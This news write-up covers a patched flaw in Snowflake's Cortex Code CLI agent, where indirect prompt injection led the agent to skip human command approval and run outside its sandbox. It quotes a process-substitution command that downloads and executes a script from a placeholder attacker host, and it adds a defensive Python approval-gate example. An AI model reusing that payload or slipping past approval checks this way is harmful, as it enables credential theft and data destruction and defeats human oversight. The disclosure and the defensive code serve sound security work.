Snowflake AI Escapes Sandbox and Executes Malware

A vulnerability in Snowflake Cortex Code CLI allowed attackers to execute arbitrary commands and escape the sandbox via indirect prompt injection, bypassing human-in-the-loop approvals and risking data exfiltration.
A vulnerability in the Snowflake Cortex Code CLI allowed malware to be installed and executed via indirect prompt injection, bypassing human-in-the-loop command approval and escaping the sandbox.
The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI’s Codex, with an additional built-in integration to run SQL in Snowflake.
Two days after release, a vulnerability was identified in Cortex Code’s command validation system that allowed specially constructed malicious commands to:
- Execute arbitrary commands without triggering human-in-the-loop approval steps
- Execute those commands outside of the Cortex CLI’s sandbox.
We demonstrate that, via indirect prompt injection, an attacker could manipulate Cortex to download and execute scripts without approval, and those scripts could leverage the victim’s active credentials to perform malicious actions in Snowflake (e.g., exfiltrate data, drop tables).
The Snowflake security team worked diligently to validate and remediate this vulnerability, and a fix was released with Cortex Code CLI version 1.0.25 on February 28th, 2026.
How the Bypass Worked
Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of malicious commands like cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)). Any shell command was executed without triggering human approval as long as the unsafe part was inside a <() expression and the full command started with a “safe” command.
Furthermore, the prompt injection manipulated the model to set a flag for unsandboxed execution. Because of the human-in-the-loop bypass, the command ran immediately outside the sandbox without the user ever being prompted for consent.
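The class of check that failed here, as an added example that is not Snowflake’s code: a gate that inspects only the leading word of a command (the flaw described above), beside a hardened gate that refuses to auto-approve when the line contains process substitution, command substitution, pipes or control operators, when it redirects to or from files, or when unsandboxed execution is requested. The allowlist, the function names and the sample commands are assumptions constructed for the example.

```python
"""Toy human-in-the-loop approval gate for an agent's shell commands.

Added example, not the Cortex Code CLI's implementation. It models the
flawed design (trust the first word) next to a hardened design (refuse to
auto-approve anything that can embed a second command, and never
auto-approve unsandboxed execution).
"""
import re
import shlex
from typing import Tuple

# Commands the agent may run without asking the human (constructed allowlist).
SAFE_COMMANDS = {"cat", "ls", "echo", "head", "grep", "wc"}

# Shell syntax that can smuggle another command into an apparently safe line.
# Process substitution <( ) and >( ) is the construct the bypass used; the
# others are listed because a gate that misses any one of them has the same hole.
EMBEDDING_SYNTAX = re.compile(r"<\(|>\(|\$\(|`|[|&;\n]")

# Redirection operators such as <, >, 2>, >> (after shlex splitting).
REDIRECTION = re.compile(r"^\d*[<>]")


def naive_auto_approve(cmd: str) -> bool:
    """Flawed gate: auto-approves when the leading word is allowlisted.

    It never looks at the rest of the line, so a process substitution after
    a 'safe' command is executed without the human ever being asked.
    """
    words = cmd.strip().split()
    return bool(words) and words[0] in SAFE_COMMANDS


def hardened_decision(cmd: str, sandboxed: bool = True) -> Tuple[bool, str]:
    """Return (auto_approved, reason).

    Auto-approval requires all of: execution stays inside the sandbox, no
    embedding syntax anywhere in the line, the line parses as one simple
    command with no redirections, and that command is on the allowlist.
    Anything else is routed to the human for approval.
    """
    if not sandboxed:
        return False, "unsandboxed execution always requires approval"
    if EMBEDDING_SYNTAX.search(cmd):
        return False, "shell construct can embed another command"
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return False, "unbalanced quoting; refusing to guess"
    if not tokens:
        return False, "empty command"
    if tokens[0] not in SAFE_COMMANDS:
        return False, f"{tokens[0]!r} is not allowlisted"
    if any(REDIRECTION.match(t) for t in tokens[1:]):
        return False, "file redirection is a side effect; ask the human"
    return True, "single allowlisted command"


if __name__ == "__main__":
    # Constructed sample lines; the first mirrors the shape of the bypass.
    samples = [
        "cat < <(sh -c 'id')",
        "cat README.md",
        "ls $(pwd)",
        "echo hi > out.txt",
        'echo "unterminated',
    ]
    for line in samples:
        print(f"{line!r:32} naive={naive_auto_approve(line)!s:5} "
              f"hardened={hardened_decision(line)}")
```

Running the block shows the gap the article describes: the naive gate waves through the process-substitution line because it begins with cat, while the hardened gate sends it, and every other non-trivial line, to the human. Note that the sandbox flag is checked first, so a model that has been steered into requesting unsandboxed execution cannot combine that with an auto-approved command.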
Impact and Risks
With remote code execution on a victim’s device, attackers can leverage cached tokens used by Cortex to authenticate to Snowflake. This allows them to:
- Steal database contents
- Drop tables
- Add malicious backdoor users
- Lock legitimate users out with network rules
During testing, context loss between sub-agents resulted in the main Cortex agent advising the user not to run a command that had already been executed by a second-level sub-agent. Snowflake has indicated that the fix is automatically applied through an update when customers next launch Cortex.
Source: Hacker News